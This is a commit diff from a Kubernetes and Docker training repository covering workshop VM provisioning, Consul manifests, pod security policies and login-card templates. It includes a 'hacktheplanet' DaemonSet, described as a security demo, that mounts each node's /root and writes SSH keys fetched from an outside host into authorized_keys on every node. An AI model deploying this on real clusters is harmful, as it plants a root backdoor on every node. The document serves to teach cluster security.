Mirror of https://github.com/jpetazzo/container.training.git
Synced 2026-02-14 17:49:59 +00:00
Merge branch 'master' into operators
34  k8s/hacktheplanet.yaml  Normal file
@@ -0,0 +1,34 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: hacktheplanet
spec:
  selector:
    matchLabels:
      app: hacktheplanet
  template:
    metadata:
      labels:
        app: hacktheplanet
    spec:
      volumes:
      - name: root
        hostPath:
          path: /root
      tolerations:
      - effect: NoSchedule
        operator: Exists
      initContainers:
      - name: hacktheplanet
        image: alpine
        volumeMounts:
        - name: root
          mountPath: /root
        command:
        - sh
        - -c
        - "apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
      containers:
      - name: web
        image: nginx
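This DaemonSet is a security demo: the `hostPath` volume plus the blanket `NoSchedule` toleration let the init container drop an attacker's SSH key on every node, masters included. A quick way to try it (a sketch; assumes `kubectl` points at a disposable test cluster you are allowed to break):

```bash
# Deploy the DaemonSet and wait for one pod per node.
kubectl apply -f k8s/hacktheplanet.yaml
kubectl rollout status daemonset/hacktheplanet

# One pod per node means one authorized_keys written per node.
kubectl get pods -l app=hacktheplanet -o wide
```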
95  k8s/persistent-consul.yaml  Normal file
@@ -0,0 +1,95 @@
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: consul
rules:
- apiGroups: [ "" ]
  resources: [ pods ]
  verbs: [ get, list ]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: consul
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: consul
subjects:
- kind: ServiceAccount
  name: consul
  namespace: orange
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: consul
---
apiVersion: v1
kind: Service
metadata:
  name: consul
spec:
  ports:
  - port: 8500
    name: http
  selector:
    app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
  name: consul
spec:
  serviceName: consul
  replicas: 3
  selector:
    matchLabels:
      app: consul
  volumeClaimTemplates:
  - metadata:
      name: data
    spec:
      accessModes:
      - ReadWriteOnce
      resources:
        requests:
          storage: 1Gi
  template:
    metadata:
      labels:
        app: consul
    spec:
      serviceAccountName: consul
      affinity:
        podAntiAffinity:
          requiredDuringSchedulingIgnoredDuringExecution:
          - labelSelector:
              matchExpressions:
              - key: app
                operator: In
                values:
                - consul
            topologyKey: kubernetes.io/hostname
      terminationGracePeriodSeconds: 10
      containers:
      - name: consul
        image: "consul:1.4.4"
        volumeMounts:
        - name: data
          mountPath: /consul/data
        args:
        - "agent"
        - "-bootstrap-expect=3"
        - "-retry-join=provider=k8s namespace=orange label_selector=\"app=consul\""
        - "-client=0.0.0.0"
        - "-data-dir=/consul/data"
        - "-server"
        - "-ui"
        lifecycle:
          preStop:
            exec:
              command:
              - /bin/sh
              - -c
              - consul leave
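One hedged way to bring the cluster up and check convergence (sketch; the RoleBinding and the `-retry-join` flag both hard-code the `orange` namespace, so that is where the manifest must be applied):

```bash
kubectl -n orange apply -f k8s/persistent-consul.yaml
kubectl -n orange rollout status statefulset/consul

# Once retry-join has converged, each server should list three members.
kubectl -n orange exec consul-0 -- consul members
```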
39  k8s/psp-privileged.yaml  Normal file
@@ -0,0 +1,39 @@
---
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
  name: privileged
  annotations:
    seccomp.security.alpha.kubernetes.io/allowedProfileNames: '*'
spec:
  privileged: true
  allowPrivilegeEscalation: true
  allowedCapabilities:
  - '*'
  volumes:
  - '*'
  hostNetwork: true
  hostPorts:
  - min: 0
    max: 65535
  hostIPC: true
  hostPID: true
  runAsUser:
    rule: 'RunAsAny'
  seLinux:
    rule: 'RunAsAny'
  supplementalGroups:
    rule: 'RunAsAny'
  fsGroup:
    rule: 'RunAsAny'
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: psp:privileged
rules:
- apiGroups: ['policy']
  resources: ['podsecuritypolicies']
  verbs: ['use']
  resourceNames: ['privileged']
38  k8s/psp-restricted.yaml  Normal file
@@ -0,0 +1,38 @@
---
apiVersion: extensions/v1beta1
kind: PodSecurityPolicy
metadata:
  annotations:
    apparmor.security.beta.kubernetes.io/allowedProfileNames: runtime/default
    apparmor.security.beta.kubernetes.io/defaultProfileName: runtime/default
    seccomp.security.alpha.kubernetes.io/allowedProfileNames: docker/default
    seccomp.security.alpha.kubernetes.io/defaultProfileName: docker/default
  name: restricted
spec:
  allowPrivilegeEscalation: false
  fsGroup:
    rule: RunAsAny
  runAsUser:
    rule: RunAsAny
  seLinux:
    rule: RunAsAny
  supplementalGroups:
    rule: RunAsAny
  volumes:
  - configMap
  - emptyDir
  - projected
  - secret
  - downwardAPI
  - persistentVolumeClaim
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: psp:restricted
rules:
- apiGroups: ['policy']
  resources: ['podsecuritypolicies']
  verbs: ['use']
  resourceNames: ['restricted']
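A PodSecurityPolicy has no effect until someone is granted the `use` verb on it through these ClusterRoles. A hedged wiring example (the binding names below are made up for illustration): default everyone to `restricted`, and allow `privileged` only in `kube-system`:

```bash
# All service accounts cluster-wide may use the "restricted" policy.
kubectl create clusterrolebinding psp:restricted:all \
        --clusterrole=psp:restricted \
        --group=system:serviceaccounts

# Only service accounts in kube-system may use the "privileged" policy.
kubectl create rolebinding psp:privileged:kube-system \
        --clusterrole=psp:privileged \
        --group=system:serviceaccounts:kube-system \
        --namespace=kube-system
```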
33  k8s/users:jean.doe.yaml  Normal file
@@ -0,0 +1,33 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: jean.doe
  namespace: users
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: users:jean.doe
rules:
- apiGroups: [ certificates.k8s.io ]
  resources: [ certificatesigningrequests ]
  verbs: [ create ]
- apiGroups: [ certificates.k8s.io ]
  resourceNames: [ users:jean.doe ]
  resources: [ certificatesigningrequests ]
  verbs: [ get, create, delete, watch ]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: users:jean.doe
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: users:jean.doe
subjects:
- kind: ServiceAccount
  name: jean.doe
  namespace: users
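These rules let the `jean.doe` ServiceAccount create and manage exactly one CSR, the one named `users:jean.doe`. A rough sketch of the client side (speculative; assumes `openssl`, GNU `base64`, and a cluster that signs 2019-era `certificates.k8s.io/v1beta1` client-auth requests):

```bash
# Generate a private key and a certificate request with CN=jean.doe.
openssl req -newkey rsa:4096 -nodes -keyout jean.doe.key \
        -new -subj /CN=jean.doe -out jean.doe.csr

# Wrap it in a CertificateSigningRequest named users:jean.doe
# (the only CSR name the ClusterRole above allows this user to manage).
kubectl create -f - <<EOF
apiVersion: certificates.k8s.io/v1beta1
kind: CertificateSigningRequest
metadata:
  name: users:jean.doe
spec:
  request: $(base64 -w0 jean.doe.csr)
  usages: [ digital signature, key encipherment, client auth ]
EOF
```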
70  k8s/volumes-for-consul.yaml  Normal file
@@ -0,0 +1,70 @@
---
apiVersion: v1
kind: PersistentVolume
metadata:
  name: consul-node2
  annotations:
    node: node2
spec:
  capacity:
    storage: 10Gi
  accessModes:
  - ReadWriteOnce
  persistentVolumeReclaimPolicy: Delete
  local:
    path: /mnt/consul
  nodeAffinity:
    required:
      nodeSelectorTerms:
      - matchExpressions:
        - key: kubernetes.io/hostname
          operator: In
          values:
          - node2
---
apiVersion: v1
kind: PersistentVolume
metadata:
  name: consul-node3
  annotations:
    node: node3
spec:
  capacity:
    storage: 10Gi
  accessModes:
  - ReadWriteOnce
  persistentVolumeReclaimPolicy: Delete
  local:
    path: /mnt/consul
  nodeAffinity:
    required:
      nodeSelectorTerms:
      - matchExpressions:
        - key: kubernetes.io/hostname
          operator: In
          values:
          - node3
---
apiVersion: v1
kind: PersistentVolume
metadata:
  name: consul-node4
  annotations:
    node: node4
spec:
  capacity:
    storage: 10Gi
  accessModes:
  - ReadWriteOnce
  persistentVolumeReclaimPolicy: Delete
  local:
    path: /mnt/consul
  nodeAffinity:
    required:
      nodeSelectorTerms:
      - matchExpressions:
        - key: kubernetes.io/hostname
          operator: In
          values:
          - node4
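These are `local` PersistentVolumes pinned to specific nodes; the `node:` annotation is informational, the `nodeAffinity` block is what actually constrains scheduling. A quick sanity check against the StatefulSet's `data` claims (sketch; assumes nodes named node2..node4 with `/mnt/consul` present):

```bash
kubectl apply -f k8s/volumes-for-consul.yaml
kubectl get pv

# After the StatefulSet is up, each "data" claim should be Bound
# to the PV of the node its pod landed on.
kubectl -n orange get pvc
```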
@@ -248,6 +248,14 @@ EOF"
     sudo tar -C /usr/local/bin -zx ship
   fi"
 
+  # Install the AWS IAM authenticator
+  pssh "
+  if [ ! -x /usr/local/bin/aws-iam-authenticator ]; then
+    ##VERSION##
+    sudo curl -o /usr/local/bin/aws-iam-authenticator https://amazon-eks.s3-us-west-2.amazonaws.com/1.12.7/2019-03-27/bin/linux/amd64/aws-iam-authenticator
+    sudo chmod +x /usr/local/bin/aws-iam-authenticator
+  fi"
+
   sep "Done"
 }
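The download is pinned to the EKS 1.12.7 release (the `##VERSION##` marker flags it for future bumps). A possible smoke test across the fleet, in the same `pssh` style the script already uses (sketch; assumes the binary's `version` subcommand):

```bash
pssh "aws-iam-authenticator version"
```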
@@ -383,6 +391,15 @@ _cmd_retag() {
     aws_tag_instances $OLDTAG $NEWTAG
 }
 
+_cmd ssh "Open an SSH session to the first node of a tag"
+_cmd_ssh() {
+    TAG=$1
+    need_tag
+    IP=$(head -1 tags/$TAG/ips.txt)
+    info "Logging into $IP"
+    ssh docker@$IP
+}
+
 _cmd start "Start a group of VMs"
 _cmd_start() {
     while [ ! -z "$*" ]; do
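Usage sketch of the new subcommand (the tag value is a placeholder; it must match a directory under `tags/` created by an earlier `start`):

```bash
# Open a shell on the first node of the given tag.
./workshopctl ssh 2019-05-01-10-00-admin-kubenet
```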
@@ -481,12 +498,12 @@ _cmd_helmprom() {
     if i_am_first_node; then
         kubectl -n kube-system get serviceaccount helm ||
         kubectl -n kube-system create serviceaccount helm
-        helm init --service-account helm
+        sudo -u docker -H helm init --service-account helm
         kubectl get clusterrolebinding helm-can-do-everything ||
         kubectl create clusterrolebinding helm-can-do-everything \
             --clusterrole=cluster-admin \
             --serviceaccount=kube-system:helm
-        helm upgrade --install prometheus stable/prometheus \
+        sudo -u docker -H helm upgrade --install prometheus stable/prometheus \
             --namespace kube-system \
             --set server.service.type=NodePort \
             --set server.service.nodePort=30090 \
@@ -31,6 +31,7 @@ infra_start() {
         die "I could not find which AMI to use in this region. Try another region?"
     fi
     AWS_KEY_NAME=$(make_key_name)
+    AWS_INSTANCE_TYPE=${AWS_INSTANCE_TYPE-t3a.medium}
 
     sep "Starting instances"
     info "        Count: $COUNT"
@@ -38,10 +39,11 @@ infra_start() {
     info "    Token/tag: $TAG"
     info "          AMI: $AMI"
     info "     Key name: $AWS_KEY_NAME"
+    info "Instance type: $AWS_INSTANCE_TYPE"
     result=$(aws ec2 run-instances \
         --key-name $AWS_KEY_NAME \
         --count $COUNT \
-        --instance-type ${AWS_INSTANCE_TYPE-t2.medium} \
+        --instance-type $AWS_INSTANCE_TYPE \
         --client-token $TAG \
         --block-device-mapping 'DeviceName=/dev/sda1,Ebs={VolumeSize=20}' \
         --image-id $AMI)
@@ -97,7 +99,7 @@ infra_disableaddrchecks() {
 }
 
 wait_until_tag_is_running() {
-    max_retry=50
+    max_retry=100
     i=0
     done_count=0
     while [[ $done_count -lt $COUNT ]]; do
@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
 import os
 import sys
 import yaml
@@ -5,7 +5,7 @@ clustersize: 1
 clusterprefix: dmuc
 
 # Jinja2 template to use to generate ready-to-cut cards
-cards_template: admin.html
+cards_template: cards.html
 
 # Use "Letter" in the US, and "A4" everywhere else
 paper_size: A4
@@ -5,7 +5,7 @@ clustersize: 3
 clusterprefix: kubenet
 
 # Jinja2 template to use to generate ready-to-cut cards
-cards_template: admin.html
+cards_template: cards.html
 
 # Use "Letter" in the US, and "A4" everywhere else
 paper_size: A4
@@ -5,7 +5,7 @@ clustersize: 3
 clusterprefix: kuberouter
 
 # Jinja2 template to use to generate ready-to-cut cards
-cards_template: admin.html
+cards_template: cards.html
 
 # Use "Letter" in the US, and "A4" everywhere else
 paper_size: A4
@@ -5,7 +5,7 @@ clustersize: 3
 clusterprefix: test
 
 # Jinja2 template to use to generate ready-to-cut cards
-cards_template: admin.html
+cards_template: cards.html
 
 # Use "Letter" in the US, and "A4" everywhere else
 paper_size: A4
@@ -1,29 +0,0 @@
# Number of VMs per cluster
clustersize: 1

# The hostname of each node will be clusterprefix + a number
clusterprefix: node

# Jinja2 template to use to generate ready-to-cut cards
cards_template: enix.html

# Use "Letter" in the US, and "A4" everywhere else
paper_size: A4

# Feel free to reduce this if your printer can handle it
paper_margin: 0.2in

# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
# If you print (or generate a PDF) using ips.html, they will be ignored.
# (The equivalent parameters must be set from the browser's print dialog.)

# This can be "test" or "stable"
engine_version: stable

# These correspond to the version numbers visible on their respective GitHub release pages
compose_version: 1.21.1
machine_version: 0.14.0

# Password used to connect with the "docker user"
docker_user_password: training
@@ -5,7 +5,7 @@ clustersize: 4
 clusterprefix: node
 
 # Jinja2 template to use to generate ready-to-cut cards
-cards_template: jerome.html
+cards_template: cards.html
 
 # Use "Letter" in the US, and "A4" everywhere else
 paper_size: Letter
@@ -7,7 +7,7 @@ clustersize: 3
 clusterprefix: node
 
 # Jinja2 template to use to generate ready-to-cut cards
-cards_template: kube101.html
+cards_template: cards.html
 
 # Use "Letter" in the US, and "A4" everywhere else
 paper_size: Letter
@@ -1,15 +1,20 @@
 #!/bin/sh
 set -e
 
-INFRA=infra/aws-eu-west-3
+export AWS_INSTANCE_TYPE=t3a.small
+
+INFRA=infra/aws-us-west-2
 
 STUDENTS=2
 
-TAG=admin-dmuc
+PREFIX=$(date +%Y-%m-%d-%H-%M)
+
+SETTINGS=admin-dmuc
+TAG=$PREFIX-$SETTINGS
 ./workshopctl start \
     --tag $TAG \
     --infra $INFRA \
-    --settings settings/$TAG.yaml \
+    --settings settings/$SETTINGS.yaml \
     --count $STUDENTS
 
 ./workshopctl deploy $TAG
@@ -17,37 +22,45 @@ TAG=admin-dmuc
 ./workshopctl kubebins $TAG
 ./workshopctl cards $TAG
 
-TAG=admin-kubenet
+SETTINGS=admin-kubenet
+TAG=$PREFIX-$SETTINGS
 ./workshopctl start \
     --tag $TAG \
     --infra $INFRA \
-    --settings settings/$TAG.yaml \
+    --settings settings/$SETTINGS.yaml \
     --count $((3*$STUDENTS))
 
+./workshopctl disableaddrchecks $TAG
 ./workshopctl deploy $TAG
 ./workshopctl kubebins $TAG
-./workshopctl disableaddrchecks $TAG
 ./workshopctl cards $TAG
 
-TAG=admin-kuberouter
+SETTINGS=admin-kuberouter
+TAG=$PREFIX-$SETTINGS
 ./workshopctl start \
     --tag $TAG \
     --infra $INFRA \
-    --settings settings/$TAG.yaml \
+    --settings settings/$SETTINGS.yaml \
     --count $((3*$STUDENTS))
 
+./workshopctl disableaddrchecks $TAG
 ./workshopctl deploy $TAG
 ./workshopctl kubebins $TAG
-./workshopctl disableaddrchecks $TAG
 ./workshopctl cards $TAG
 
-TAG=admin-test
-#INFRA=infra/aws-us-west-1
+export AWS_INSTANCE_TYPE=t3a.medium
+
+SETTINGS=admin-test
+TAG=$PREFIX-$SETTINGS
 ./workshopctl start \
     --tag $TAG \
     --infra $INFRA \
-    --settings settings/$TAG.yaml \
+    --settings settings/$SETTINGS.yaml \
     --count $((3*$STUDENTS))
 
 ./workshopctl deploy $TAG
 ./workshopctl kube $TAG 1.13.5
 ./workshopctl cards $TAG
@@ -1,124 +0,0 @@
{# Feel free to customize or override anything in there! #}
{%- set url = "http://FIXME.container.training" -%}
{%- set pagesize = 9 -%}
{%- if clustersize == 1 -%}
{%- set workshop_name = "Docker workshop" -%}
{%- set cluster_or_machine = "machine virtuelle" -%}
{%- set this_or_each = "cette" -%}
{%- set plural = "" -%}
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
{%- else -%}
{%- set workshop_name = "Kubernetes workshop" -%}
{%- set cluster_or_machine = "cluster" -%}
{%- set this_or_each = "chaque" -%}
{%- set plural = "s" -%}
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
{%- set image_src = image_src_kube -%}
{%- endif -%}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><style>
@import url('https://fonts.googleapis.com/css?family=Slabo+27px');

body, table {
  margin: 0;
  padding: 0;
  line-height: 1em;
  font-size: 15px;
  font-family: 'Slabo 27px';
}

table {
  border-spacing: 0;
  margin-top: 0.4em;
  margin-bottom: 0.4em;
  border-left: 0.8em double grey;
  padding-left: 0.4em;
}

div {
  float: left;
  border: 1px dotted black;
  padding-top: 1%;
  padding-bottom: 1%;
  /* columns * (width+left+right) < 100% */
  width: 30%;
  padding-left: 1.5%;
  padding-right: 1.5%;
}

p {
  margin: 0.4em 0 0.4em 0;
}

img {
  height: 4em;
  float: right;
  margin-right: -0.3em;
}

img.enix {
  height: 4.0em;
  margin-top: 0.4em;
}

img.kube {
  height: 4.2em;
  margin-top: 1.7em;
}

.logpass {
  font-family: monospace;
  font-weight: bold;
}

.pagebreak {
  page-break-after: always;
  clear: both;
  display: block;
  height: 8px;
}
</style></head>
<body>
{% for cluster in clusters %}
{% if loop.index0>0 and loop.index0%pagesize==0 %}
<span class="pagebreak"></span>
{% endif %}
<div>

<p>
  Voici les informations permettant de se connecter à un
  des environnements utilisés pour cette formation.
  Vous pouvez vous connecter à {{ this_or_each }} machine
  virtuelle avec n'importe quel client SSH.
</p>

<p>
<img class="enix" src="https://enix.io/static/img/logos/logo-domain-cropped.png" />
<table>
<tr><td>cluster:</td></tr>
<tr><td class="logpass">{{ clusterprefix }}</td></tr>
<tr><td>identifiant:</td></tr>
<tr><td class="logpass">docker</td></tr>
<tr><td>mot de passe:</td></tr>
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
</table>
</p>

<p>
Adresse{{ plural }} IP :
<!--<img class="kube" src="{{ image_src }}" />-->
<table>
{% for node in cluster %}
<tr><td>{{ clusterprefix }}{{ loop.index }}:</td><td>{{ node }}</td></tr>
{% endfor %}
</table>
</p>
<p>Le support de formation est à l'adresse suivante :
<center>{{ url }}</center>
</p>
</div>
{% endfor %}
</body>
</html>
@@ -1,29 +1,88 @@
 {# Feel free to customize or override anything in there! #}
-{%- set url = "http://container.training/" -%}
-{%- set pagesize = 12 -%}
-{%- if clustersize == 1 -%}
-{%- set workshop_name = "Docker workshop" -%}
-{%- set cluster_or_machine = "machine" -%}
-{%- set this_or_each = "this" -%}
-{%- set machine_is_or_machines_are = "machine is" -%}
-{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
-{%- else -%}
-{%- set workshop_name = "orchestration workshop" -%}
-{%- set cluster_or_machine = "cluster" -%}
-{%- set this_or_each = "each" -%}
-{%- set machine_is_or_machines_are = "machines are" -%}
-{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
-{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
-{%- set image_src = image_src_swarm -%}

+{%- set url = "http://FIXME.container.training/" -%}
+{%- set pagesize = 9 -%}
+{%- set lang = "en" -%}
+{%- set event = "training session" -%}
+{%- set backside = False -%}
+{%- set image = "kube" -%}
+{%- set clusternumber = 100 -%}
+
+{%- set image_src = {
+  "docker": "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png",
+  "swarm": "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png",
+  "kube": "https://avatars1.githubusercontent.com/u/13629408",
+  "enix": "https://enix.io/static/img/logos/logo-domain-cropped.png",
+}[image] -%}
+{%- if lang == "en" and clustersize == 1 -%}
+{%- set intro -%}
+Here is the connection information to your very own
+machine for this {{ event }}.
+You can connect to this VM with any SSH client.
+{%- endset -%}
+{%- set listhead -%}
+Your machine is:
+{%- endset -%}
+{%- endif -%}
+{%- if lang == "en" and clustersize != 1 -%}
+{%- set intro -%}
+Here is the connection information to your very own
+cluster for this {{ event }}.
+You can connect to each VM with any SSH client.
+{%- endset -%}
+{%- set listhead -%}
+Your machines are:
+{%- endset -%}
+{%- endif -%}
+{%- if lang == "fr" and clustersize == 1 -%}
+{%- set intro -%}
+Voici les informations permettant de se connecter à votre
+machine pour cette formation.
+Vous pouvez vous connecter à cette machine virtuelle
+avec n'importe quel client SSH.
+{%- endset -%}
+{%- set listhead -%}
+Adresse IP:
+{%- endset -%}
+{%- endif -%}
+{%- if lang == "en" and clusterprefix != "node" -%}
+{%- set intro -%}
+Here is the connection information for the
+<strong>{{ clusterprefix }}</strong> environment.
+{%- endset -%}
+{%- endif -%}
+{%- if lang == "fr" and clustersize != 1 -%}
+{%- set intro -%}
+Voici les informations permettant de se connecter à votre
+cluster pour cette formation.
+Vous pouvez vous connecter à chaque machine virtuelle
+avec n'importe quel client SSH.
+{%- endset -%}
+{%- set listhead -%}
+Adresses IP:
+{%- endset -%}
+{%- endif -%}
+{%- if lang == "en" -%}
+{%- set slides_are_at -%}
+You can find the slides at:
+{%- endset -%}
+{%- endif -%}
+{%- if lang == "fr" -%}
+{%- set slides_are_at -%}
+Le support de formation est à l'adresse suivante :
+{%- endset -%}
+{%- endif -%}
 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
 <html>
 <head><style>
 @import url('https://fonts.googleapis.com/css?family=Slabo+27px');
 
 body, table {
   margin: 0;
   padding: 0;
   line-height: 1em;
-  font-size: 14px;
+  font-size: 15px;
   font-family: 'Slabo 27px';
 }
 
 table {
@@ -37,24 +96,54 @@ table {
 div {
     float: left;
     border: 1px dotted black;
+    {% if backside %}
+    height: 31%;
+    {% endif %}
     padding-top: 1%;
     padding-bottom: 1%;
     /* columns * (width+left+right) < 100% */
+    /*
     width: 21.5%;
     padding-left: 1.5%;
     padding-right: 1.5%;
+    */
+    /**/
+    width: 30%;
+    padding-left: 1.5%;
+    padding-right: 1.5%;
+    /**/
 }
 
 p {
     margin: 0.4em 0 0.4em 0;
 }
 
+div.back {
+    border: 1px dotted white;
+}
+
+div.back p {
+    margin: 0.5em 1em 0 1em;
+}
+
 img {
     height: 4em;
     float: right;
-    margin-right: -0.4em;
+    margin-right: -0.2em;
 }
 
+/*
+img.enix {
+    height: 4.0em;
+    margin-top: 0.4em;
+}
+
+img.kube {
+    height: 4.2em;
+    margin-top: 1.7em;
+}
+*/
+
 .logpass {
     font-family: monospace;
     font-weight: bold;
@@ -69,19 +158,15 @@ img {
 </style></head>
 <body>
 {% for cluster in clusters %}
 {% if loop.index0>0 and loop.index0%pagesize==0 %}
 <span class="pagebreak"></span>
 {% endif %}
 <div>
 
-<p>
-  Here is the connection information to your very own
-  {{ cluster_or_machine }} for this {{ workshop_name }}.
-  You can connect to {{ this_or_each }} VM with any SSH client.
-</p>
+<p>{{ intro }}</p>
 <p>
 <img src="{{ image_src }}" />
 <table>
+{% if clusternumber != None %}
+<tr><td>cluster:</td></tr>
+<tr><td class="logpass">{{ clusternumber + loop.index }}</td></tr>
+{% endif %}
 <tr><td>login:</td></tr>
 <tr><td class="logpass">docker</td></tr>
 <tr><td>password:</td></tr>
@@ -90,17 +175,44 @@ img {
 
 </p>
 <p>
-Your {{ machine_is_or_machines_are }}:
+{{ listhead }}
 <table>
 {% for node in cluster %}
-<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
+<tr>
+  <td>{{ clusterprefix }}{{ loop.index }}:</td>
+  <td>{{ node }}</td>
+</tr>
 {% endfor %}
 </table>
 </p>
-<p>You can find the slides at:
+
+<p>
+{{ slides_are_at }}
 <center>{{ url }}</center>
 </p>
 </div>
+{% if loop.index%pagesize==0 or loop.last %}
+<span class="pagebreak"></span>
+{% if backside %}
+{% for x in range(pagesize) %}
+<div class="back">
+<br/>
+<p>You got this at the workshop
+"Getting Started With Kubernetes and Container Orchestration"
+during QCON London (March 2019).</p>
+<p>If you liked that workshop,
+I can train your team or organization
+on Docker, container, and Kubernetes,
+with curriculums of 1 to 5 days.
+</p>
+<p>Interested? Contact me at:</p>
+<p>jerome.petazzoni@gmail.com</p>
+<p>Thank you!</p>
+</div>
+{% endfor %}
+<span class="pagebreak"></span>
+{% endif %}
+{% endif %}
 {% endfor %}
 </body>
 </html>
@@ -1,121 +0,0 @@
{# Feel free to customize or override anything in there! #}
{%- set url = "http://FIXME.container.training" -%}
{%- set pagesize = 9 -%}
{%- if clustersize == 1 -%}
{%- set workshop_name = "Docker workshop" -%}
{%- set cluster_or_machine = "machine virtuelle" -%}
{%- set this_or_each = "cette" -%}
{%- set plural = "" -%}
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
{%- else -%}
{%- set workshop_name = "Kubernetes workshop" -%}
{%- set cluster_or_machine = "cluster" -%}
{%- set this_or_each = "chaque" -%}
{%- set plural = "s" -%}
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
{%- set image_src = image_src_kube -%}
{%- endif -%}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><style>
@import url('https://fonts.googleapis.com/css?family=Slabo+27px');

body, table {
  margin: 0;
  padding: 0;
  line-height: 1em;
  font-size: 15px;
  font-family: 'Slabo 27px';
}

table {
  border-spacing: 0;
  margin-top: 0.4em;
  margin-bottom: 0.4em;
  border-left: 0.8em double grey;
  padding-left: 0.4em;
}

div {
  float: left;
  border: 1px dotted black;
  padding-top: 1%;
  padding-bottom: 1%;
  /* columns * (width+left+right) < 100% */
  width: 30%;
  padding-left: 1.5%;
  padding-right: 1.5%;
}

p {
  margin: 0.4em 0 0.4em 0;
}

img {
  height: 4em;
  float: right;
  margin-right: -0.3em;
}

img.enix {
  height: 4.0em;
  margin-top: 0.4em;
}

img.kube {
  height: 4.2em;
  margin-top: 1.7em;
}

.logpass {
  font-family: monospace;
  font-weight: bold;
}

.pagebreak {
  page-break-after: always;
  clear: both;
  display: block;
  height: 8px;
}
</style></head>
<body>
{% for cluster in clusters %}
{% if loop.index0>0 and loop.index0%pagesize==0 %}
<span class="pagebreak"></span>
{% endif %}
<div>

<p>
  Voici les informations permettant de se connecter à votre
  {{ cluster_or_machine }} pour cette formation.
  Vous pouvez vous connecter à {{ this_or_each }} machine virtuelle
  avec n'importe quel client SSH.
</p>
<p>
<img class="enix" src="https://enix.io/static/img/logos/logo-domain-cropped.png" />
<table>
<tr><td>identifiant:</td></tr>
<tr><td class="logpass">docker</td></tr>
<tr><td>mot de passe:</td></tr>
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
</table>

</p>
<p>
Adresse{{ plural }} IP :
<!--<img class="kube" src="{{ image_src }}" />-->
<table>
{% for node in cluster %}
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
{% endfor %}
</table>
</p>
<p>Le support de formation est à l'adresse suivante :
<center>{{ url }}</center>
</p>
</div>
{% endfor %}
</body>
</html>
@@ -1,134 +0,0 @@
{# Feel free to customize or override anything in there! #}
{%- set url = "http://qconuk2019.container.training/" -%}
{%- set pagesize = 9 -%}
{%- if clustersize == 1 -%}
{%- set workshop_name = "Docker workshop" -%}
{%- set cluster_or_machine = "machine" -%}
{%- set this_or_each = "this" -%}
{%- set machine_is_or_machines_are = "machine is" -%}
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
{%- else -%}
{%- set workshop_name = "Kubernetes workshop" -%}
{%- set cluster_or_machine = "cluster" -%}
{%- set this_or_each = "each" -%}
{%- set machine_is_or_machines_are = "machines are" -%}
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
{%- set image_src = image_src_kube -%}
{%- endif -%}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><style>
@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
body, table {
  margin: 0;
  padding: 0;
  line-height: 1.0em;
  font-size: 15px;
  font-family: 'Slabo 27px';
}

table {
  border-spacing: 0;
  margin-top: 0.4em;
  margin-bottom: 0.4em;
  border-left: 0.8em double grey;
  padding-left: 0.4em;
}

div {
  float: left;
  border: 1px dotted black;
  height: 31%;
  padding-top: 1%;
  padding-bottom: 1%;
  /* columns * (width+left+right) < 100% */
  width: 30%;
  padding-left: 1.5%;
  padding-right: 1.5%;
}

div.back {
  border: 1px dotted white;
}

div.back p {
  margin: 0.5em 1em 0 1em;
}

p {
  margin: 0.4em 0 0.8em 0;
}

img {
  height: 5em;
  float: right;
  margin-right: 1em;
}

.logpass {
  font-family: monospace;
  font-weight: bold;
}

.pagebreak {
  page-break-after: always;
  clear: both;
  display: block;
  height: 8px;
}
</style></head>
<body>
{% for cluster in clusters %}
<div>

<p>
  Here is the connection information to your very own
  {{ cluster_or_machine }} for this {{ workshop_name }}.
  You can connect to {{ this_or_each }} VM with any SSH client.
</p>
<p>
